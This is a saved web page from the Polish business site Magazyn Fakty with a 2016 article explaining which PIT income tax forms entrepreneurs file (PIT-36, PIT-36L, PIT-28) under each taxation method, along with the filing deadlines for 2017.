<!DOCTYPE html><html lang="pl-PL" prefix="og: http://ogp.me/ns#"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

<!--[if lt IE 9]>
	<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
	<script src="http://css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script>
<![endif]--> 
<title> Pity 2016 z działalności gospodarczej - Magazyn Fakty </title>
<script src="https://www.googletagservices.com/activeview/js/current/osd.js?cb=%2Fr20100101"></script><script src="https://pagead2.googlesyndication.com/pub-config/r20160913/ca-pub-9090873593537305.js"></script><script async="" src="//www.google-analytics.com/analytics.js"></script><script src="https://connect.facebook.net/en_US/sdk.js?hash=ee3e93ba4f1c977d804ab90ba8697b2e" async="" crossorigin="anonymous"></script><script id="facebook-jssdk" src="//connect.facebook.net/en_US/sdk.js#xfbml=1&amp;version=v2.6"></script><script>(function(d, s, id){
				 var js, fjs = d.getElementsByTagName(s)[0];
				 if (d.getElementById(id)) {return;}
				 js = d.createElement(s); js.id = id;
				 js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.6";
				 fjs.parentNode.insertBefore(js, fjs);
			   }(document, 'script', 'facebook-jssdk'));</script>
<!-- This site is optimized with the Yoast SEO plugin v9.2.1 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="Podatnicy prowadzący działalność gospodarczą mogą mieć opodatkowane dochody z tej działalności na zasadach ogólnych według skali podatkowej">
<link rel="canonical" href="http://magazynfakty.pl/pity-2016-dzialalnosci-gospodarczej/">
<meta property="og:locale" content="pl_PL">
<meta property="og:type" content="article">
<meta property="og:title" content="Pity 2016 z działalności gospodarczej - Magazyn Fakty">
<meta property="og:description" content="Podatnicy prowadzący działalność gospodarczą mogą mieć opodatkowane dochody z tej działalności na zasadach ogólnych według skali podatkowej">
<meta property="og:url" content="http://magazynfakty.pl/pity-2016-dzialalnosci-gospodarczej/">
<meta property="og:site_name" content="Magazyn Fakty">
<meta property="article:tag" content="PIT-28">
<meta property="article:tag" content="PIT-36">
<meta property="article:tag" content="PIT-36L">
<meta property="article:tag" content="Pity 2016">
<meta property="article:tag" content="Terminy składania pitów 2016">
<meta property="article:tag" content="Terminy składania pitów przez przedsiębiorcę">
<meta property="article:section" content="Bankowość i finanse">
<meta property="article:published_time" content="2016-09-09T14:43:42+00:00">
<meta property="article:modified_time" content="2017-06-23T09:51:20+00:00">
<meta property="og:updated_time" content="2017-06-23T09:51:20+00:00">
<meta property="og:image" content="http://magazynfakty.pl/wp-content/uploads/2016/09/dd-1.jpg">
<meta property="og:image:width" content="626">
<meta property="og:image:height" content="497">
<meta name="twitter:card" content="summary">
<meta name="twitter:description" content="Podatnicy prowadzący działalność gospodarczą mogą mieć opodatkowane dochody z tej działalności na zasadach ogólnych według skali podatkowej">
<meta name="twitter:title" content="Pity 2016 z działalności gospodarczej - Magazyn Fakty">
<meta name="twitter:image" content="http://magazynfakty.pl/wp-content/uploads/2016/09/dd-1.jpg">
<!-- / Yoast SEO plugin. -->

<link rel="dns-prefetch" href="//w.sharethis.com">
<link rel="dns-prefetch" href="//maxcdn.bootstrapcdn.com">
<link rel="dns-prefetch" href="//fonts.googleapis.com">
<link rel="dns-prefetch" href="//s.w.org">
<link rel="stylesheet" id="validate-engine-css-css" href="http://magazynfakty.pl/wp-content/plugins/wysija-newsletters/css/validationEngine.jquery.css?ver=2.10.2" type="text/css" media="all">
<link rel="stylesheet" id="responsive-lightbox-nivo-css" href="http://magazynfakty.pl/wp-content/plugins/responsive-lightbox/assets/nivo/nivo-lightbox.min.css?ver=2.0.5" type="text/css" media="all">
<link rel="stylesheet" id="responsive-lightbox-nivo-default-css" href="http://magazynfakty.pl/wp-content/plugins/responsive-lightbox/assets/nivo/themes/default/default.css?ver=2.0.5" type="text/css" media="all">
<link rel="stylesheet" id="simple-share-buttons-adder-font-awesome-css" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=fb7ace8cf477567d3cd46575c275f43a" type="text/css" media="all">
<link rel="stylesheet" id="mf_theme-style-css" href="http://magazynfakty.pl/wp-content/themes/rsd_rwd_5_0/style.css?ver=fb7ace8cf477567d3cd46575c275f43a" type="text/css" media="all">
<link rel="stylesheet" id="mf_dynamic_style-css" href="http://magazynfakty.pl/wp-content/themes/rsd_rwd_5_0/style.php?ver=fb7ace8cf477567d3cd46575c275f43a" type="text/css" media="all">
<link rel="stylesheet" id="ubuntu-css" href="http://fonts.googleapis.com/css?family=Ubuntu%3A300%2C400%2C500%2C700&amp;subset=latin%2Clatin-ext&amp;ver=fb7ace8cf477567d3cd46575c275f43a" type="text/css" media="all">
<link rel="stylesheet" id="font-awesome-css" href="http://magazynfakty.pl/wp-content/themes/rsd_rwd_5_0/css/font-awesome.min.css?ver=1.0" type="text/css" media="all">
<link rel="stylesheet" id="style.owl.carousel-css" href="http://magazynfakty.pl/wp-content/themes/rsd_rwd_5_0/css/owl.carousel.css?ver=fb7ace8cf477567d3cd46575c275f43a" type="text/css" media="all">
<link rel="stylesheet" id="msl-main-css" href="http://magazynfakty.pl/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css?ver=3.5.3" type="text/css" media="all">
<link rel="stylesheet" id="msl-custom-css" href="http://magazynfakty.pl/wp-content/uploads/master-slider/custom.css?ver=2.8" type="text/css" media="all">
<script type="text/javascript" src="http://magazynfakty.pl/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1"></script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/plugins/responsive-lightbox/assets/nivo/nivo-lightbox.min.js?ver=2.0.5"></script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/plugins/responsive-lightbox/assets/infinitescroll/infinite-scroll.pkgd.min.js?ver=fb7ace8cf477567d3cd46575c275f43a"></script>
<script type="text/javascript">
/* <![CDATA[ */
var rlArgs = {"script":"nivo","selector":"lightbox","customEvents":"","activeGalleries":"1","effect":"fade","clickOverlayToClose":"1","keyboardNav":"1","errorMessage":"The requested content cannot be loaded. Please try again later.","woocommerce_gallery":"0","ajaxurl":"http:\/\/magazynfakty.pl\/wp-admin\/admin-ajax.php","nonce":"aa02d8abd4"};
/* ]]> */
</script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/plugins/responsive-lightbox/js/front.js?ver=2.0.5"></script>
<script id="st_insights_js" type="text/javascript" src="http://w.sharethis.com/button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&amp;product=simpleshare"></script>
<script type="text/javascript" src="http://magazynfakty.pl/wp-content/themes/rsd_rwd_5_0/js/owl.carousel.js?ver=fb7ace8cf477567d3cd46575c275f43a"></script>
<link rel="https://api.w.org/" href="http://magazynfakty.pl/wp-json/">
<link rel="shortlink" href="http://magazynfakty.pl/?p=25138">
<link rel="alternate" type="application/json+oembed" href="http://magazynfakty.pl/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fmagazynfakty.pl%2Fpity-2016-dzialalnosci-gospodarczej%2F">
<link rel="alternate" type="text/xml+oembed" href="http://magazynfakty.pl/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fmagazynfakty.pl%2Fpity-2016-dzialalnosci-gospodarczej%2F&amp;format=xml">
<script>var ms_grabbing_curosr = 'http://magazynfakty.pl/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'http://magazynfakty.pl/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script>
<meta name="generator" content="MasterSlider 3.5.3 - Responsive Touch Image Slider | avt.li/msf">
<meta property="fb:app_id" content=""><meta property="fb:admins" content="">        <style type="text/css">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow:hidden;position:relative}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:"lucida grande", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}@keyframes fb_transform{from{opacity:0;transform:scale(.95)}to{opacity:1;transform:scale(1)}}.fb_animate{animation:fb_transform .3s forwards}
.fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_dialog_advanced{border-radius:8px;padding:10px}.fb_dialog_content{background:#fff;color:#373737}.fb_dialog_close_icon{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px}.fb_dialog_mobile .fb_dialog_close_icon{left:5px;right:auto;top:5px}.fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}.fb_dialog_close_icon:hover{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent}.fb_dialog_close_icon:active{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid #365899;color:#fff;font-size:14px;font-weight:bold;margin:0}.fb_dialog_content .dialog_title>span{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}body.fb_hidden{height:100%;left:0;margin:0;overflow:visible;position:absolute;top:-10000px;transform:none;width:100%}.fb_dialog.fb_dialog_mobile.loading{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}.fb_dialog.fb_dialog_mobile.loading.centered{background:none;height:auto;min-height:initial;min-width:initial;width:auto}.fb_dialog.fb_dialog_mobile.loading.centered #fb_dialog_loader_spinner{width:100%}.fb_dialog.fb_dialog_mobile.loading.centered .fb_dialog_content{background:none}.loading.centered #fb_dialog_loader_close{clear:both;color:#fff;display:block;font-size:18px;padding-top:20px}#fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .4);bottom:0;left:0;min-height:100%;position:absolute;right:0;top:0;width:100%;z-index:10000}#fb-root #fb_dialog_ipad_overlay.hidden{display:none}.fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}.fb_dialog_mobile .fb_dialog_iframe{position:sticky;top:0}.fb_dialog_content .dialog_header{background:linear-gradient(from(#738aba), to(#2c4987));border-bottom:1px solid;border-color:#1d3c78;box-shadow:white 0 1px 1px -1px inset;color:#fff;font:bold 14px Helvetica, sans-serif;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}.fb_dialog_content .dialog_header table{height:43px;width:100%}.fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px}.fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px}.fb_dialog_content .touchable_button{background:linear-gradient(from(#4267B2), to(#2a4887));background-clip:padding-box;border:1px solid #29487d;border-radius:3px;display:inline-block;line-height:18px;margin-top:3px;max-width:85px;padding:4px 12px;position:relative}.fb_dialog_content .dialog_header .touchable_button input{background:none;border:none;color:#fff;font:bold 12px Helvetica, sans-serif;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}.fb_dialog_content .dialog_content{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #4a4a4a;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f5f6f7;border:1px solid #4a4a4a;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_button{text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}#fb_dialog_loader_spinner{animation:rotateSpinner 1.2s linear infinite;background-color:transparent;background-image:url(https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/t-wz8gw1xG1.png);background-position:50% 50%;background-repeat:no-repeat;height:24px;width:24px}@keyframes rotateSpinner{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}
.fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}</style><link rel="preload" href="https://adservice.google.com.ph/adsid/integrator.js?domain=magazynfakty.pl"><script type="text/javascript" src="https://adservice.google.com.ph/adsid/integrator.js?domain=magazynfakty.pl"></script><link rel="preload" href="https://adservice.google.com/adsid/integrator.js?domain=magazynfakty.pl"><script type="text/javascript" src="https://adservice.google.com/adsid/integrator.js?domain=magazynfakty.pl"></script><link rel="preload" href="http://pagead2.googlesyndication.com/pagead/js/r20190320/r20190131/show_ads_impl.js"></head><body class="post-template-default single single-post postid-25138 single-format-standard _masterslider _ms_version_3.5.3"><div id="fb-root"></div>
        <script>(function (d, s, id) {
                var js, fjs = d.getElementsByTagName(s)[0];
                if (d.getElementById(id))
                    return;
                js = d.createElement(s);
                js.id = id;
                js.src = "//connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v2.0";
                fjs.parentNode.insertBefore(js, fjs);
            }(document, 'script', 'facebook-jssdk'));</script>
        		<style type="text/css" id="wp-custom-css">
			.mf-art-grid-title {
	font-size: 17px;
}

.mf-article-box-wp-caption a {
   font-size: 16px;
}		</style>
	<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-66744315-1', 'auto');
  ga('send', 'pageview');

</script>

<script async="" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<script>

     (adsbygoogle = window.adsbygoogle || []).push({

          google_ad_client: "ca-pub-9090873593537305",

          enable_page_level_ads: true

     });

</script>

	
<div>

<div class="core mf-search-hide mf-bg-page">
    <div class="container-mf">
        <div class="row-mf">
            <div class="kolumna12"><div class="wew">
				<div class="mf-search-box">
<form action="http://magazynfakty.pl/" method="get" target="_top">
<div class="mf-search-text"><input name="s" type="text"></div>
<div class="mf-search-btn"><input type="submit" value="SZUKAJ"></div>
<div style="clear:both"></div>
</form>
</div>            </div></div>
        </div>
    </div>
</div>
 

</div>
 
<div class="core mf-head-c">
    <div class="container-mf">
        <div class="row-mf">
            <div class="kolumna4">
                <header>
                    <div style=" margin:30px 0px 15px 0px" class="mf-header-logo"><a href="http://magazynfakty.pl/"><img src="http://magazynfakty.pl/wp-content/uploads/2015/08/Fakty-logo-plaskie2.jpg" alt="Pity 2016 z działalności gospodarczej"></a></div> 
                                        </header>   		
            </div>
            <div class="kolumna8"><div class="wew">
            <div>
                <li id="black-studio-tinymce-2" class="widget widget_black_studio_tinymce"><div class="textwidget"><p><a href="http://www.frdl.org.pl/poradnik-dla-radnych-na-kadencje-2018-2023/"><img class="alignright wp-image-35340 size-full" src="http://magazynfakty.pl/wp-content/uploads/2018/11/100x600_abcsamorzadu.png" alt="" width="600" height="100"></a></p>
</div></li>
              </div>
                      </div></div>
        </div>
    </div>
</div>
<div class="mf-responsive-header-menu-btn"><i class="fa fa-bars"></i> Menu</div>
<div class="mf-responsive-header-menu">
<div class="core mf-header-menu-c">
    <div class="container-mf">
        <div class="row-mf">
            <div class="kolumna12"><div class="wew-h">
                <nav>
                    <div class="menu-glowne-container"><div class="mf-header-menu"><ul><li id="menu-item-14975" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-14975"><a href="http://magazynfakty.pl/"><i class="fa fa-home"></i></a></li>
<li id="menu-item-14405" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-14405"><a href="http://magazynfakty.pl/kategoria/gospodarka/">Gospodarka</a></li>
<li id="menu-item-14443" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14443"><a href="http://magazynfakty.pl/kategoria/jakosc/">Jakość</a></li>
<li id="menu-item-14444" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14444"><a href="http://magazynfakty.pl/kategoria/innowacje/">Innowacje</a></li>
<li id="menu-item-14519" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14519"><a href="http://magazynfakty.pl/kategoria/budownictwo/">Budownictwo</a></li>
<li id="menu-item-14522" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14522"><a href="http://magazynfakty.pl/kategoria/samorzad/">Samorząd</a></li>
<li id="menu-item-14523" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14523"><a href="http://magazynfakty.pl/kategoria/unia-europejska/">Unia Europejska</a></li>
<li id="menu-item-14416" class="mf-search-btn-hide-menu mf-right-menu-position no-mobile menu-item menu-item-type-custom menu-item-object-custom menu-item-14416"><a href="#"><i class="fa fa-search"></i></a></li>
<li id="menu-item-13568" class="mf-right-menu-position menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-13568"><a href="http://magazynfakty.pl/magazyn-fakty/">Magazyn FAKTY</a>
<ul class="sub-menu">
	<li id="menu-item-14961" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14961"><a href="http://magazynfakty.pl/o-magazynie/">O Magazynie FAKTY</a></li>
	<li id="menu-item-14442" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14442"><a href="http://magazynfakty.pl/redakcja/">Redakcja</a></li>
	<li id="menu-item-14962" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14962"><a href="http://magazynfakty.pl/prenumerata/">Prenumerata</a></li>
	<li id="menu-item-14441" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14441"><a href="http://magazynfakty.pl/reklama/">Reklama</a></li>
	<li id="menu-item-14397" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14397"><a href="http://magazynfakty.pl/kontakt/">Kontakt</a></li>
	<li id="menu-item-14398" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14398"><a href="http://magazynfakty.pl/archiwum/">Archiwum Magazynu</a></li>
</ul>
</li>
</ul><div style="clear:both"></div></div></div>                </nav>
            </div></div>
        </div>
    </div>
</div>
</div>



<div class="core mf-header-menu-2-c ">
    <div class="container-mf">
        <div class="row-mf">
            <div class="kolumna12"><div class="wew-h">
                <nav>
                    <div class="menu-kategorie-hm2-container"><div class="mf-header-menu-2"><ul><li id="menu-item-14401" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14401"><a href="http://magazynfakty.pl/kategoria/energetyka/">Energetyka</a></li>
<li id="menu-item-14973" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14973"><a href="http://magazynfakty.pl/kategoria/wyniki-finansowe-spolek/">Finanse</a></li>
<li id="menu-item-14516" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14516"><a href="http://magazynfakty.pl/kategoria/przemysl-obronny/">Przemysł obronny</a></li>
<li id="menu-item-14518" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14518"><a href="http://magazynfakty.pl/kategoria/transport-spedycja-logistyka/">Transport</a></li>
<li id="menu-item-14969" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14969"><a href="http://magazynfakty.pl/kategoria/motoryzacja/">Motoryzacja</a></li>
<li id="menu-item-14974" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14974"><a href="http://magazynfakty.pl/kategoria/it/">IT</a></li>
<li id="menu-item-14967" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14967"><a href="http://magazynfakty.pl/kategoria/ekologia/">Ekologia</a></li>
<li id="menu-item-14971" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14971"><a href="http://magazynfakty.pl/kategoria/rolnictwo/">Rolnictwo</a></li>
<li id="menu-item-14968" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14968"><a href="http://magazynfakty.pl/kategoria/medycyna/">Medycyna</a></li>
<li id="menu-item-14966" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14966"><a href="http://magazynfakty.pl/kategoria/csr/">CSR</a></li>
<li id="menu-item-14972" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14972"><a href="http://magazynfakty.pl/kategoria/wydarzenia/">Wydarzenia</a></li>
</ul>
					<div style="clear:both"></div></div></div>                </nav>
            </div></div>
        </div>
    </div>
</div>



<div class="core mf-search-hide-menu mf-bg-page">
    <div class="container-mf">
        <div class="row-mf">
            <div class="kolumna12"><div class="wew">
				<div class="mf-search-box">
<form action="http://magazynfakty.pl/" method="get" target="_top">
<div class="mf-search-text"><input name="s" type="text"></div>
<div class="mf-search-btn"><input type="submit" value="SZUKAJ"></div>
<div style="clear:both"></div>
</form>
</div>            </div></div>
        </div>
    </div>
</div>


<div class="core mf-bg-page mf-breadcrumb">
<div class="container-mf">
    <div class="row-mf">  
        <div class="kolumna12"><div class="wew">
        	<div class="breadcrumbs"><i class="fa fa-sitemap"></i><!-- Breadcrumb NavXT 6.2.1 -->
<span property="itemListElement" typeof="ListItem"><a property="item" typeof="WebPage" title="Go to Magazyn Fakty." href="http://magazynfakty.pl" class="home"><span property="name">Magazyn Fakty</span></a><meta property="position" content="1"></span> &gt; <span property="itemListElement" typeof="ListItem"><a property="item" typeof="WebPage" title="Go to Aktualności." href="http://magazynfakty.pl/aktualnosci/" class="post-root post post-post"><span property="name">Aktualności</span></a><meta property="position" content="2"></span> &gt; <span property="itemListElement" typeof="ListItem"><a property="item" typeof="WebPage" title="Go to the Bankowość i finanse category archives." href="http://magazynfakty.pl/kategoria/bankowosc-i-finanse/" class="taxonomy category"><span property="name">Bankowość i finanse</span></a><meta property="position" content="3"></span> &gt; <span class="post post-post current-item">Pity 2016 z działalności gospodarczej</span> </div>
        </div></div>
    </div>
</div>
</div>

<div class="core mf-bg-page">
    <div class="container-mf mf-bg-page">
        <div class="row-mf">
            <div class="kolumna8"><div class="wew mf-single-content">
                                                    <article>
                        <h1 class="site-title"><span>Pity 2016 z działalności gospodarczej</span></h1>
                        
                                                
                          
                		                        
                                                
                        <div class="mf-entry-meta"><p><a href="http://magazynfakty.pl/kategoria/bankowosc-i-finanse/" rel="category tag">Bankowość i finanse</a>  <a href="http://magazynfakty.pl/kategoria/firma/" rel="category tag">Firma</a>  <a href="http://magazynfakty.pl/kategoria/gospodarka/" rel="category tag">Gospodarka</a>  <a href="http://magazynfakty.pl/kategoria/kod/" rel="category tag">KOD</a>  <a href="http://magazynfakty.pl/kategoria/porady/" rel="category tag">Porady</a>  <a href="http://magazynfakty.pl/kategoria/praca-wynagrodzenia/" rel="category tag">Praca i wynagrodzenia</a>  <a href="http://magazynfakty.pl/kategoria/prawo/" rel="category tag">Prawo</a>  <a href="http://magazynfakty.pl/kategoria/wybor-redakcji/" rel="category tag">Wybór redakcji</a>  <a href="http://magazynfakty.pl/kategoria/zarzadzanie/" rel="category tag">Zarządzanie</a></p></div>                        <style>.fb_iframe_widget span{width:460px !important;} .fb_iframe_widget iframe {margin: 0 !important;}        .fb_edge_comment_widget { display: none !important; }</style><div style="width:100%; text-align:left"><div class="fb-like fb_iframe_widget" style="width:450px; overflow: hidden !important; " data-href="http://magazynfakty.pl/pity-2016-dzialalnosci-gospodarczej/" data-size="small" data-colorscheme="light" data-width="450" data-layout="standard" data-action="like" data-show-faces="true" data-share="true" kid_directed_site="false" fb-xfbml-state="rendered" fb-iframe-plugin-query="action=like&amp;app_id=&amp;color_scheme=light&amp;container_width=450&amp;href=http%3A%2F%2Fmagazynfakty.pl%2Fpity-2016-dzialalnosci-gospodarczej%2F&amp;layout=standard&amp;locale=en_US&amp;sdk=joey&amp;share=true&amp;show_faces=true&amp;size=small&amp;width=450"><span style="vertical-align: bottom; width: 450px; height: 20px;"><iframe name="f355c881b2847d4" width="450px" height="1000px" frameborder="0" allowtransparency="true" allowfullscreen="true" scrolling="no" allow="encrypted-media" title="fb:like Facebook Social Plugin" src="https://www.facebook.com/v2.6/plugins/like.php?action=like&amp;app_id=&amp;channel=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2Fd_vbiawPdxB.js%3Fversion%3D44%23cb%3Df13fa699e8ee40a%26domain%3Dmagazynfakty.pl%26origin%3Dhttp%253A%252F%252Fmagazynfakty.pl%252Ff479dd015e04aa%26relation%3Dparent.parent&amp;color_scheme=light&amp;container_width=450&amp;href=http%3A%2F%2Fmagazynfakty.pl%2Fpity-2016-dzialalnosci-gospodarczej%2F&amp;layout=standard&amp;locale=en_US&amp;sdk=joey&amp;share=true&amp;show_faces=true&amp;size=small&amp;width=450" class="" style="border: none; visibility: visible; width: 450px; height: 20px;"></iframe></span></div></div><p><strong><img class="size-medium wp-image-25139 alignleft" src="http://magazynfakty.pl/wp-content/uploads/2016/09/dd-1-300x238.jpg" alt="" width="300" height="238" srcset="http://magazynfakty.pl/wp-content/uploads/2016/09/dd-1-300x238.jpg 300w, http://magazynfakty.pl/wp-content/uploads/2016/09/dd-1-600x476.jpg 600w, http://magazynfakty.pl/wp-content/uploads/2016/09/dd-1.jpg 626w" sizes="(max-width: 300px) 100vw, 300px">Podatnicy prowadzący działalność gospodarczą mogą mieć opodatkowane dochody z tej działalności na zasadach ogólnych według skali podatkowej, podatkiem liniowym lub ryczałtem od przychodów ewidencjonowanych. Od formy opodatkowania zależy rodzaj deklaracji PIT..</strong></p>
<div id="paste_tresc">
<h2>Pity 2016 w zależności od sposobu opodatkowania:</h2>
<h2>PIT-36</h2>
<p>Rozliczanie przychodów z działalności gospodarczej opodatkowanej na zasadach ogólnych według skali podatkowej dokonujemy na formularzu PIT-36. Do deklaracji tej trzeba dołączyć także załącznik PIT/B, który zawiera informacje o wysokości dochodu (lub straty) z pozarolniczej działalności gospodarczej z danego roku podatkowego.</p>
<p>Wypełniając deklarację PIT-36 przedsiębiorca może skorzystać z preferencji podatkowych (wspólne rozliczenie z małżonkiem lub z dzieckiem), ulg i odliczeń (np. ulgi prorodzinnej).</p>
<p>Na formularzu PIT-36 wykazujemy też inne przychody. Mając np. przychody z pracy na etacie czy z umowy zlecenia przedsiębiorca wykazuje je również w PIT -36.</p>
<h2>PIT-36L</h2>
<p>Podatek liniowy rozliczamy korzystając z wzoru PIT-36L. Na formularzu PIT-36L nie wykazujemy przychodów uzyskiwanych z innych źródeł. Przedsiębiorca rozliczający się na druku PIT-36L może być zmuszony do złożenia dodatkowo innych deklaracji podatkowych, jeśli oprócz zarobków firmowych posiada inne źródła przychodów.W sytuacji gdy np. będąc przedsiębiorcą podatnik &nbsp;jednocześnie pracuje na etacie, to musi oprócz PIT-36L złożyć drugą deklarację rozliczeniową PIT-37 z dochodów uzyskiwanych z pracy na etacie.</p>
<p>Rozliczając się na druku PIT-36L przedsiębiorca nie uwzględnia kwoty wolnej od podatku. Na PIT-36L nie można rozliczyć na zasadach preferencyjnych, czyli łącznie z małżonkiem lub jako osoba samotnie wychowująca dziecko.</p>
<h2>PIT-28</h2>
<p>Przychody podlegające opodatkowaniu ryczałtem od przychodów ewidencjonowanych przedsiębiorca wykazuje na druku PIT-28. Do deklaracji tej należy dołączyć załącznik PIT-28A, który stanowi informację o przychodach w roku podatkowym opodatkowanego na zasadach ryczałtu.</p>
<p>Ryczałt od przychodów ewidencjonowanych jest uproszczoną metodą obliczania należności podatkowych z tytułu prowadzenia działalności gospodarczej. W tym przypadku przedsiębiorca nie ma może skorzystania z kwoty wolnej od podatku czy pomniejszenia przychodu o koszty jego uzyskania.</p>
<h2>Terminy składania pitów 2016 &nbsp;przez przedsiębiorcę</h2>
<p>Pity 2016 przedsiębiorcy z fiskusem rozliczają w różnych terminach zależnie od rodzaju składanej deklaracji.</p>
<p>Przedsiębiorcy rozliczający PIT na drukach PIT-36 (rozliczenie podatku na zasadach ogólnych według skali) oraz PIT-36L(podatek liniowy) mają czas do końca kwietnia roku następującego po roku podatkowym. W 2017 roku deklaracje będzie można złożyć do 2 maja, gdyż 30 kwietnia i 1 maja są dniami wolnymi od pracy. Natomiast ryczałtowcy mają obowiązek rozliczyć się do 31 stycznia 2017 roku.</p>
<p>Wszystkie <a href="https://www.pitax.pl/rozliczenie-pit/">https://www.pitax.pl/rozliczenie-pit/</a>przedsiębiorca może rozliczyć przez internet. Rozliczenie pit online jest wygodne, bezpieczne i pozwala zaoszczędzić czas.</p>
</div>
